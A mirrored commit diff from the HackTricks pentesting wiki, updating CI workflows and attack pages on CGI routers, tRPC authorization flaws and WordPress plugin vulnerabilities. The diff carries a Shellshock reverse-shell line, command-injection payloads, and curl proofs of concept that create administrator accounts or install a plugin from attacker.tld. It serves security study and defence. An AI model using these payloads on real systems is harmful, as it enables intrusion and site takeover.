mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Merge branch 'master' into update_Silent_Smishing__The_Hidden_Abuse_of_Cellular_Rout_20251001_130854
This commit is contained in:
		
						commit
						b9365ac52d
					
				
							
								
								
									
										106
									
								
								.github/workflows/build_master.yml
									
									
									
									
										vendored
									
									
								
							
							
						
						
									
										106
									
								
								.github/workflows/build_master.yml
									
									
									
									
										vendored
									
									
								
							| @ -43,7 +43,7 @@ jobs: | ||||
|           && sudo apt update \ | ||||
|           && sudo apt install gh -y | ||||
|        | ||||
|       - name: Publish search index release asset | ||||
|       - name: Push search index to hacktricks-searchindex repo | ||||
|         shell: bash | ||||
|         env: | ||||
|           PAT_TOKEN: ${{ secrets.PAT_TOKEN }} | ||||
| @ -51,43 +51,99 @@ jobs: | ||||
|           set -euo pipefail | ||||
| 
 | ||||
|           ASSET="book/searchindex.js" | ||||
|           TAG="searchindex-en" | ||||
|           TITLE="Search Index (en)" | ||||
|           TARGET_REPO="HackTricks-wiki/hacktricks-searchindex" | ||||
|           FILENAME="searchindex-en.js" | ||||
| 
 | ||||
|           if [ ! -f "$ASSET" ]; then | ||||
|             echo "Expected $ASSET to exist after build" >&2 | ||||
|             exit 1 | ||||
|           fi | ||||
| 
 | ||||
|           TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}" | ||||
|           TOKEN="${PAT_TOKEN}" | ||||
|           if [ -z "$TOKEN" ]; then | ||||
|             echo "No token available for GitHub CLI" >&2 | ||||
|             echo "No PAT_TOKEN available" >&2 | ||||
|             exit 1 | ||||
|           fi | ||||
|           export GH_TOKEN="$TOKEN" | ||||
| 
 | ||||
|           # Delete the release if it exists | ||||
|           echo "Checking if release $TAG exists..." | ||||
|           if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then | ||||
|             echo "Release $TAG already exists, deleting it..." | ||||
|             gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag || { | ||||
|               echo "Failed to delete release, trying without cleanup-tag..." | ||||
|               gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" || { | ||||
|                 echo "Warning: Could not delete existing release, will try to recreate..." | ||||
|               } | ||||
|             } | ||||
|             sleep 2  # Give GitHub API a moment to process the deletion | ||||
|           # Clone the searchindex repo | ||||
|           git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo | ||||
|            | ||||
|           cd /tmp/searchindex-repo | ||||
|           git config user.name "GitHub Actions" | ||||
|           git config user.email "github-actions@github.com" | ||||
|            | ||||
|           # Compress the searchindex file | ||||
|           cd "${GITHUB_WORKSPACE}" | ||||
|           gzip -9 -k -f "$ASSET" | ||||
|            | ||||
|           # Show compression stats | ||||
|           ORIGINAL_SIZE=$(wc -c < "$ASSET") | ||||
|           COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz") | ||||
|           RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}") | ||||
|           echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)" | ||||
|            | ||||
|           # Copy the .gz version to the searchindex repo | ||||
|           cd /tmp/searchindex-repo | ||||
|           cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz" | ||||
|            | ||||
|           # Stage the updated file | ||||
|           git add "${FILENAME}.gz" | ||||
|            | ||||
|           # Commit and push with retry logic | ||||
|           if git diff --staged --quiet; then | ||||
|             echo "No changes to commit" | ||||
|           else | ||||
|             echo "Release $TAG does not exist, proceeding with creation..." | ||||
|             TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC") | ||||
|             git commit -m "Update searchindex files - ${TIMESTAMP}" | ||||
|              | ||||
|             # Retry push up to 20 times with pull --rebase between attempts | ||||
|             MAX_RETRIES=20 | ||||
|             RETRY_COUNT=0 | ||||
|             while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do | ||||
|               if git push origin master; then | ||||
|                 echo "Successfully pushed on attempt $((RETRY_COUNT + 1))" | ||||
|                 break | ||||
|               else | ||||
|                 RETRY_COUNT=$((RETRY_COUNT + 1)) | ||||
|                 if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then | ||||
|                   echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..." | ||||
|                    | ||||
|                   # Try normal rebase first | ||||
|                   if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then | ||||
|                     echo "Rebase successful, retrying push..." | ||||
|                   else | ||||
|                     # If rebase fails due to divergent histories (orphan branch reset), re-clone | ||||
|                     if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then | ||||
|                       echo "Detected history rewrite, re-cloning repository..." | ||||
|                       cd /tmp | ||||
|                       rm -rf searchindex-repo | ||||
|                       git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo | ||||
|                       cd searchindex-repo | ||||
|                       git config user.name "GitHub Actions" | ||||
|                       git config user.email "github-actions@github.com" | ||||
|                        | ||||
|                       # Re-copy the .gz version | ||||
|                       cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz" | ||||
|                        | ||||
|                       git add "${FILENAME}.gz" | ||||
|                       TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC") | ||||
|                       git commit -m "Update searchindex files - ${TIMESTAMP}" | ||||
|                       echo "Re-cloned and re-committed, will retry push..." | ||||
|                     else | ||||
|                       echo "Rebase failed for unknown reason, retrying anyway..." | ||||
|                     fi | ||||
|                   fi | ||||
|                    | ||||
|                   sleep 1 | ||||
|                 else | ||||
|                   echo "Failed to push after $MAX_RETRIES attempts" | ||||
|                   exit 1 | ||||
|                 fi | ||||
|               fi | ||||
|             done | ||||
|           fi | ||||
|            | ||||
|           # Create new release (with force flag to overwrite if deletion failed) | ||||
|           gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" || { | ||||
|             echo "Failed to create release, trying with force flag..." | ||||
|             gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag >/dev/null 2>&1 || true | ||||
|             sleep 2 | ||||
|             gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" | ||||
|           } | ||||
|           echo "Successfully pushed searchindex files" | ||||
| 
 | ||||
| 
 | ||||
|       # Login in AWs | ||||
|  | ||||
							
								
								
									
										90
									
								
								.github/workflows/translate_all.yml
									
									
									
									
										vendored
									
									
								
							
							
						
						
									
										90
									
								
								.github/workflows/translate_all.yml
									
									
									
									
										vendored
									
									
								
							| @ -129,7 +129,7 @@ jobs: | ||||
|           git pull | ||||
|           MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1) | ||||
|        | ||||
|       - name: Publish search index release asset | ||||
|       - name: Push search index to hacktricks-searchindex repo | ||||
|         shell: bash | ||||
|         env: | ||||
|           PAT_TOKEN: ${{ secrets.PAT_TOKEN }} | ||||
| @ -137,31 +137,93 @@ jobs: | ||||
|           set -euo pipefail | ||||
| 
 | ||||
|           ASSET="book/searchindex.js" | ||||
|           TAG="searchindex-${BRANCH}" | ||||
|           TITLE="Search Index (${BRANCH})" | ||||
|           TARGET_REPO="HackTricks-wiki/hacktricks-searchindex" | ||||
|           FILENAME="searchindex-${BRANCH}.js" | ||||
| 
 | ||||
|           if [ ! -f "$ASSET" ]; then | ||||
|             echo "Expected $ASSET to exist after build" >&2 | ||||
|             exit 1 | ||||
|           fi | ||||
| 
 | ||||
|           TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}" | ||||
|           TOKEN="${PAT_TOKEN}" | ||||
|           if [ -z "$TOKEN" ]; then | ||||
|             echo "No token available for GitHub CLI" >&2 | ||||
|             echo "No PAT_TOKEN available" >&2 | ||||
|             exit 1 | ||||
|           fi | ||||
|           export GH_TOKEN="$TOKEN" | ||||
| 
 | ||||
|           # Delete the release if it exists | ||||
|           if gh release view "$TAG" >/dev/null 2>&1; then | ||||
|             echo "Release $TAG already exists, deleting it..." | ||||
|             gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" | ||||
|           fi | ||||
|           # Clone the searchindex repo | ||||
|           git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo | ||||
|            | ||||
|           # Create new release | ||||
|           gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for $BRANCH" --repo "$GITHUB_REPOSITORY" | ||||
|           # Compress the searchindex file | ||||
|           gzip -9 -k -f "$ASSET" | ||||
|            | ||||
|           # Show compression stats | ||||
|           ORIGINAL_SIZE=$(wc -c < "$ASSET") | ||||
|           COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz") | ||||
|           RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}") | ||||
|           echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)" | ||||
|            | ||||
|           # Copy ONLY the .gz version to the searchindex repo (no uncompressed .js) | ||||
|           cp "${ASSET}.gz" "/tmp/searchindex-repo/${FILENAME}.gz" | ||||
|            | ||||
|           # Commit and push with retry logic | ||||
|           cd /tmp/searchindex-repo | ||||
|           git config user.name "GitHub Actions" | ||||
|           git config user.email "github-actions@github.com" | ||||
|           git add "${FILENAME}.gz" | ||||
|            | ||||
|           if git diff --staged --quiet; then | ||||
|             echo "No changes to commit" | ||||
|           else | ||||
|             git commit -m "Update ${FILENAME} from hacktricks-cloud build" | ||||
|              | ||||
|             # Retry push up to 20 times with pull --rebase between attempts | ||||
|             MAX_RETRIES=20 | ||||
|             RETRY_COUNT=0 | ||||
|             while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do | ||||
|               if git push origin master; then | ||||
|                 echo "Successfully pushed on attempt $((RETRY_COUNT + 1))" | ||||
|                 break | ||||
|               else | ||||
|                 RETRY_COUNT=$((RETRY_COUNT + 1)) | ||||
|                 if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then | ||||
|                   echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..." | ||||
|                    | ||||
|                   # Try normal rebase first | ||||
|                   if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then | ||||
|                     echo "Rebase successful, retrying push..." | ||||
|                   else | ||||
|                     # If rebase fails due to divergent histories (orphan branch reset), re-clone | ||||
|                     if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then | ||||
|                       echo "Detected history rewrite, re-cloning repository..." | ||||
|                       cd /tmp | ||||
|                       rm -rf searchindex-repo | ||||
|                       git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo | ||||
|                       cd searchindex-repo | ||||
|                       git config user.name "GitHub Actions" | ||||
|                       git config user.email "github-actions@github.com" | ||||
|                        | ||||
|                       # Re-copy ONLY the .gz version (no uncompressed .js) | ||||
|                       cp "${ASSET}.gz" "${FILENAME}.gz" | ||||
|                        | ||||
|                       git add "${FILENAME}.gz" | ||||
|                       git commit -m "Update ${FILENAME}.gz from hacktricks-cloud build" | ||||
|                       echo "Re-cloned and re-committed, will retry push..." | ||||
|                     else | ||||
|                       echo "Rebase failed for unknown reason, retrying anyway..." | ||||
|                     fi | ||||
|                   fi | ||||
|                    | ||||
|                   sleep 1 | ||||
|                 else | ||||
|                   echo "Failed to push after $MAX_RETRIES attempts" | ||||
|                   exit 1 | ||||
|                 fi | ||||
|               fi | ||||
|             done | ||||
|           fi | ||||
| 
 | ||||
|       # Login in AWs | ||||
|       # Login in AWS | ||||
|       - name: Configure AWS credentials using OIDC | ||||
|         uses: aws-actions/configure-aws-credentials@v3 | ||||
|         with: | ||||
|  | ||||
| @ -226,7 +226,7 @@ https://www.lasttowersolutions.com/ | ||||
| 
 | ||||
| ### [K8Studio - The Smarter GUI to Manage Kubernetes.](https://k8studio.io/) | ||||
| 
 | ||||
| <figure><img src="images/k8studio.jpg" alt="k8studio logo"><figcaption></figcaption></figure> | ||||
| <figure><img src="images/k8studio.png" alt="k8studio logo"><figcaption></figcaption></figure> | ||||
| 
 | ||||
| K8Studio IDE empowers DevOps, DevSecOps, and developers to manage, monitor, and secure Kubernetes clusters efficiently. Leverage our AI-driven insights, advanced security framework, and intuitive CloudMaps GUI to visualize your clusters, understand their state, and act with confidence. | ||||
| 
 | ||||
|  | ||||
										
											Binary file not shown.
										
									
								
							| Before Width: | Height: | Size: 6.5 KiB | 
							
								
								
									
										
											BIN
										
									
								
								src/images/k8studio.png
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										
											BIN
										
									
								
								src/images/k8studio.png
									
									
									
									
									
										Normal file
									
								
							
										
											Binary file not shown.
										
									
								
							| After Width: | Height: | Size: 87 KiB | 
| @ -83,7 +83,7 @@ You can check if the sudo version is vulnerable using this grep. | ||||
| sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]" | ||||
| ``` | ||||
| 
 | ||||
| #### sudo < v1.28 | ||||
| #### sudo < v1.8.28 | ||||
| 
 | ||||
| From @sickrov | ||||
| 
 | ||||
|  | ||||
| @ -59,11 +59,37 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt | ||||
| > run | ||||
| ``` | ||||
| 
 | ||||
| ## **Proxy \(MitM to Web server requests\)** | ||||
| ## Centralized CGI dispatchers (single endpoint routing via selector parameters) | ||||
| 
 | ||||
| CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com" | ||||
| Many embedded web UIs multiplex dozens of privileged actions behind a single CGI endpoint (for example, `/cgi-bin/cstecgi.cgi`) and use a selector parameter such as `topicurl=<handler>` to route the request to an internal function. | ||||
| 
 | ||||
| As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server. | ||||
| Methodology to exploit these routers: | ||||
| 
 | ||||
| - Enumerate handler names: scrape JS/HTML, brute-force with wordlists, or unpack firmware and grep for handler strings used by the dispatcher. | ||||
| - Test unauthenticated reachability: some handlers forget auth checks and are directly callable. | ||||
| - Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`. | ||||
| 
 | ||||
| Generic exploit shapes: | ||||
| 
 | ||||
| ```http | ||||
| POST /cgi-bin/cstecgi.cgi HTTP/1.1 | ||||
| Content-Type: application/x-www-form-urlencoded | ||||
| 
 | ||||
| # 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools | ||||
| topicurl=<handler>¶m=-n | ||||
| 
 | ||||
| # 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell | ||||
| topicurl=setEasyMeshAgentCfg&agentName=;id; | ||||
| 
 | ||||
| # 3) Validator bypass → arbitrary file write in file-touching handlers | ||||
| topicurl=setWizardCfg&<crafted_fields>=/etc/init.d/S99rc | ||||
| ``` | ||||
| 
 | ||||
| Detection and hardening: | ||||
| 
 | ||||
| - Watch for unauthenticated requests to centralized CGI endpoints with `topicurl` set to sensitive handlers. | ||||
| - Flag parameters that begin with `-` (argv option injection attempts). | ||||
| - Vendors: enforce authentication on all state-changing handlers, validate using strict allowlists/types/lengths, and never pass user-controlled strings as command-line flags. | ||||
| 
 | ||||
| ## Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) | ||||
| 
 | ||||
| @ -80,8 +106,14 @@ curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:500 | ||||
| 
 | ||||
| **More info about the vuln and possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** | ||||
| 
 | ||||
| ## **Proxy \(MitM to Web server requests\)** | ||||
| 
 | ||||
| CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com" | ||||
| 
 | ||||
| As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server. | ||||
| 
 | ||||
| ## **References** | ||||
| 
 | ||||
| - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
| @ -28,6 +28,53 @@ Pentesting APIs involves a structured approach to uncovering vulnerabilities. Th | ||||
| - **Advanced Parameter Techniques**: Test with unexpected data types in JSON payloads or play with XML data for XXE injections. Also, try parameter pollution and wildcard characters for broader testing. | ||||
| - **Version Testing**: Older API versions might be more susceptible to attacks. Always check for and test against multiple API versions. | ||||
| 
 | ||||
| ### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls | ||||
| 
 | ||||
| Modern TypeScript stacks commonly use tRPC with Zod for input validation. In tRPC, `protectedProcedure` typically ensures the request has a valid session (authentication) but does not imply the caller has the right role/permissions (authorization). This mismatch leads to Broken Function Level Authorization/BOLA if sensitive procedures are only gated by `protectedProcedure`. | ||||
| 
 | ||||
| - Threat model: Any low-privileged authenticated user can call admin-grade procedures if role checks are missing (e.g., background migrations, feature flags, tenant-wide maintenance, job control). | ||||
| - Black-box signal: `POST /api/trpc/<router>.<procedure>` endpoints that succeed for basic accounts when they should be admin-only. Self-serve signups drastically increase exploitability. | ||||
| - Typical tRPC route shape (v10+): JSON body wrapped under `{"input": {...}}`. | ||||
| 
 | ||||
| Example vulnerable pattern (no role/permission gate): | ||||
| 
 | ||||
| ```ts | ||||
| // The endpoint for retrying a migration job | ||||
| // This checks for a valid session (authentication) | ||||
| retry: protectedProcedure | ||||
|   // but not for an admin role (authorization). | ||||
|   .input(z.object({ name: z.string() })) | ||||
|   .mutation(async ({ input, ctx }) => { | ||||
|     // Logic to restart a sensitive migration | ||||
|   }), | ||||
| ``` | ||||
| 
 | ||||
| Practical exploitation (black-box) | ||||
| 
 | ||||
| 1) Register a normal account and obtain an authenticated session (cookies/headers). | ||||
| 2) Enumerate background jobs or other sensitive resources via “list”/“all”/“status” procedures. | ||||
| 
 | ||||
| ```bash | ||||
| curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.all' \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   -b '<AUTH_COOKIES>' \ | ||||
|   --data '{"input":{}}' | ||||
| ``` | ||||
| 
 | ||||
| 3) Invoke privileged actions such as restarting a job: | ||||
| 
 | ||||
| ```bash | ||||
| curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.retry' \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   -b '<AUTH_COOKIES>' \ | ||||
|   --data '{"input":{"name":"<migration_name>"}}' | ||||
| ``` | ||||
| 
 | ||||
| Impact to assess | ||||
| 
 | ||||
| - Data corruption via non-idempotent restarts: Forcing concurrent runs of migrations/workers can create race conditions and inconsistent partial states (silent data loss, broken analytics). | ||||
| - DoS via worker/DB starvation: Repeatedly triggering heavy jobs can exhaust worker pools and database connections, causing tenant-wide outages. | ||||
| 
 | ||||
| ### **Tools and Resources for API Pentesting** | ||||
| 
 | ||||
| - [**kiterunner**](https://github.com/assetnote/kiterunner): Excellent for discovering API endpoints. Use it to scan and brute force paths and parameters against target APIs. | ||||
| @ -53,8 +100,6 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0 | ||||
| ## References | ||||
| 
 | ||||
| - [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire) | ||||
| - [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
| @ -447,15 +447,6 @@ Detection checklist | ||||
| - Review REST registrations for privileged callbacks that lack robust `permission_callback` checks and instead rely on request headers. | ||||
| - Look for usages of core user-management functions (`wp_insert_user`, `wp_create_user`) inside REST handlers that are gated only by header values. | ||||
| 
 | ||||
| Hardening | ||||
| 
 | ||||
| - Never derive authentication or authorization from client-controlled headers. | ||||
| - If a reverse proxy must inject identity, terminate trust at the proxy and strip inbound copies (e.g., `unset X-Wcpay-Platform-Checkout-User` at the edge), then pass a signed token and verify it server-side. | ||||
| - For REST routes performing privileged actions, require `current_user_can()` checks and a strict `permission_callback` (do NOT use `__return_true`). | ||||
| - Prefer first-party auth (cookies, application passwords, OAuth) over header “impersonation”. | ||||
| 
 | ||||
| References: see the links at the end of this page for a public case and broader analysis. | ||||
| 
 | ||||
| ### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0) | ||||
| 
 | ||||
| WordPress themes and plugins frequently expose AJAX handlers through the `wp_ajax_` and `wp_ajax_nopriv_` hooks.  When the **_nopriv_** variant is used **the callback becomes reachable by unauthenticated visitors**, so any sensitive action must additionally implement: | ||||
| @ -511,31 +502,6 @@ Other impactful targets include plugin/theme `.php` files (to break security plu | ||||
| * Concatenation of unsanitised user input into paths (look for `$_POST`, `$_GET`, `$_REQUEST`). | ||||
| * Absence of `check_ajax_referer()` and `current_user_can()`/`is_user_logged_in()`. | ||||
| 
 | ||||
| #### Hardening | ||||
| 
 | ||||
| ```php | ||||
| function secure_remove_font_family() { | ||||
|     if ( ! is_user_logged_in() ) { | ||||
|         wp_send_json_error( 'forbidden', 403 ); | ||||
|     } | ||||
|     check_ajax_referer( 'litho_fonts_nonce' ); | ||||
| 
 | ||||
|     $fontfamily = sanitize_file_name( wp_unslash( $_POST['fontfamily'] ?? '' ) ); | ||||
|     $srcdir = trailingslashit( wp_upload_dir()['basedir'] ) . 'litho-fonts/' . $fontfamily; | ||||
| 
 | ||||
|     if ( ! str_starts_with( realpath( $srcdir ), realpath( wp_upload_dir()['basedir'] ) ) ) { | ||||
|         wp_send_json_error( 'invalid path', 400 ); | ||||
|     } | ||||
|     // … proceed … | ||||
| } | ||||
| add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_family' ); | ||||
| //  🔒  NO wp_ajax_nopriv_ registration | ||||
| ``` | ||||
| 
 | ||||
| > [!TIP] | ||||
| > **Always** treat any write/delete operation on disk as privileged and double-check: | ||||
| > • Authentication  • Authorisation  • Nonce  • Input sanitisation  • Path containment (e.g. via `realpath()` plus `str_starts_with()`). | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ### Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role") | ||||
| @ -565,12 +531,6 @@ Why it’s exploitable | ||||
| - If a user previously had higher privileges saved in `_asenha_view_admin_as_original_roles` and was downgraded, they can restore them by hitting the reset path. | ||||
| - In some deployments, any authenticated user could trigger a reset for another username still present in `viewing_admin_as_role_are` (broken authorization). | ||||
| 
 | ||||
| Attack prerequisites | ||||
| 
 | ||||
| - Vulnerable plugin version with the feature enabled. | ||||
| - Target account has a stale high-privilege role stored in user meta from earlier use. | ||||
| - Any authenticated session; missing nonce/capability on the reset flow. | ||||
| 
 | ||||
| Exploitation (example) | ||||
| 
 | ||||
| ```bash | ||||
| @ -591,21 +551,6 @@ Detection checklist | ||||
|   - Modify roles via `add_role()` / `remove_role()` without `current_user_can()` and `wp_verify_nonce()` / `check_admin_referer()`. | ||||
|   - Authorize based on a plugin option array (e.g., `viewing_admin_as_role_are`) instead of the actor’s capabilities. | ||||
| 
 | ||||
| Hardening | ||||
| 
 | ||||
| - Enforce capability checks on every state-changing branch (e.g., `current_user_can('manage_options')` or stricter). | ||||
| - Require nonces for all role/permission mutations and verify them: `check_admin_referer()` / `wp_verify_nonce()`. | ||||
| - Never trust request-supplied usernames; resolve the target user server-side based on the authenticated actor and explicit policy. | ||||
| - Invalidate “original roles” state on profile/role updates to avoid stale high-privilege restoration: | ||||
| 
 | ||||
| ```php | ||||
| add_action( 'profile_update', function( $user_id ) { | ||||
|     delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' ); | ||||
| }, 10, 1 ); | ||||
| ``` | ||||
| 
 | ||||
| - Consider storing minimal state and using time-limited, capability-guarded tokens for temporary role switches. | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ### Unauthenticated privilege escalation via cookie‑trusted user switching on public init (Service Finder “sf-booking”) | ||||
| @ -852,6 +797,123 @@ Patched behaviour (Jobmonster 4.8.0) | ||||
| 
 | ||||
| - Removed the insecure fallback from $_POST['id']; $user_email must originate from verified provider branches in switch($_POST['using']). | ||||
| 
 | ||||
| ## Unauthenticated privilege escalation via REST token/key minting on predictable identity (OttoKit/SureTriggers ≤ 1.0.82) | ||||
| 
 | ||||
| Some plugins expose REST endpoints that mint reusable “connection keys” or tokens without verifying the caller’s capabilities. If the route authenticates only on a guessable attribute (e.g., username) and does not bind the key to a user/session with capability checks, any unauthenticated attacker can mint a key and invoke privileged actions (admin account creation, plugin actions → RCE). | ||||
| 
 | ||||
| - Vulnerable route (example): sure-triggers/v1/connection/create-wp-connection | ||||
| - Flaw: accepts a username, issues a connection key without current_user_can() or a strict permission_callback | ||||
| - Impact: full takeover by chaining the minted key to internal privileged actions | ||||
| 
 | ||||
| PoC – mint a connection key and use it | ||||
| 
 | ||||
| ```bash | ||||
| # 1) Obtain key (unauthenticated). Exact payload varies per plugin | ||||
| curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/connection/create-wp-connection" \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   --data '{"username":"admin"}' | ||||
| # → {"key":"<conn_key>", ...} | ||||
| 
 | ||||
| # 2) Call privileged plugin action using the minted key (namespace/route vary per plugin) | ||||
| curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/users" \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   -H 'X-Connection-Key: <conn_key>' \ | ||||
|   --data '{"username":"pwn","email":"p@t.ld","password":"p@ss","role":"administrator"}' | ||||
| ``` | ||||
| 
 | ||||
| Why it’s exploitable | ||||
| - Sensitive REST route protected only by low-entropy identity proof (username) or missing permission_callback | ||||
| - No capability enforcement; minted key is accepted as a universal bypass | ||||
| 
 | ||||
| Detection checklist | ||||
| - Grep plugin code for register_rest_route(..., [ 'permission_callback' => '__return_true' ]) | ||||
| - Any route that issues tokens/keys based on request-supplied identity (username/email) without tying to an authenticated user or capability | ||||
| - Look for subsequent routes that accept the minted token/key without server-side capability checks | ||||
| 
 | ||||
| Hardening | ||||
| - For any privileged REST route: require permission_callback that enforces current_user_can() for the required capability | ||||
| - Do not mint long-lived keys from client-supplied identity; if needed, issue short-lived, user-bound tokens post-authentication and recheck capabilities on use | ||||
| - Validate the caller’s user context (wp_set_current_user is not sufficient alone) and reject requests where !is_user_logged_in() || !current_user_can(<cap>) | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## Nonce gate misuse → unauthenticated arbitrary plugin installation (FunnelKit Automations ≤ 3.5.3) | ||||
| 
 | ||||
| Nonces prevent CSRF, not authorization. If code treats a nonce pass as a green light and then skips capability checks for privileged operations (e.g., install/activate plugins), unauthenticated attackers can meet a weak nonce requirement and reach RCE by installing a backdoored or vulnerable plugin. | ||||
| 
 | ||||
| - Vulnerable path: plugin/install_and_activate | ||||
| - Flaw: weak nonce hash check; no current_user_can('install_plugins'|'activate_plugins') once nonce “passes” | ||||
| - Impact: full compromise via arbitrary plugin install/activation | ||||
| 
 | ||||
| PoC (shape depends on plugin; illustrative only) | ||||
| 
 | ||||
| ```bash | ||||
| curl -i -s -X POST https://victim.tld/wp-json/<fk-namespace>/plugin/install_and_activate \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   --data '{"_nonce":"<weak-pass>","slug":"hello-dolly","source":"https://attacker.tld/mal.zip"}' | ||||
| ``` | ||||
| 
 | ||||
| Detection checklist | ||||
| - REST/AJAX handlers that modify plugins/themes with only wp_verify_nonce()/check_admin_referer() and no capability check | ||||
| - Any code path that sets $skip_caps = true after nonce validation | ||||
| 
 | ||||
| Hardening | ||||
| - Always treat nonces as CSRF tokens only; enforce capability checks regardless of nonce state | ||||
| - Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code | ||||
| - Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## Unauthenticated SQLi via s search parameter in depicter-* actions (Depicter Slider ≤ 3.6.1) | ||||
| 
 | ||||
| Multiple depicter-* actions consumed the s (search) parameter and concatenated it into SQL queries without parameterization. | ||||
| 
 | ||||
| - Parameter: s (search) | ||||
| - Flaw: direct string concatenation in WHERE/LIKE clauses; no prepared statements/sanitization | ||||
| - Impact: database exfiltration (users, hashes), lateral movement | ||||
| 
 | ||||
| PoC | ||||
| 
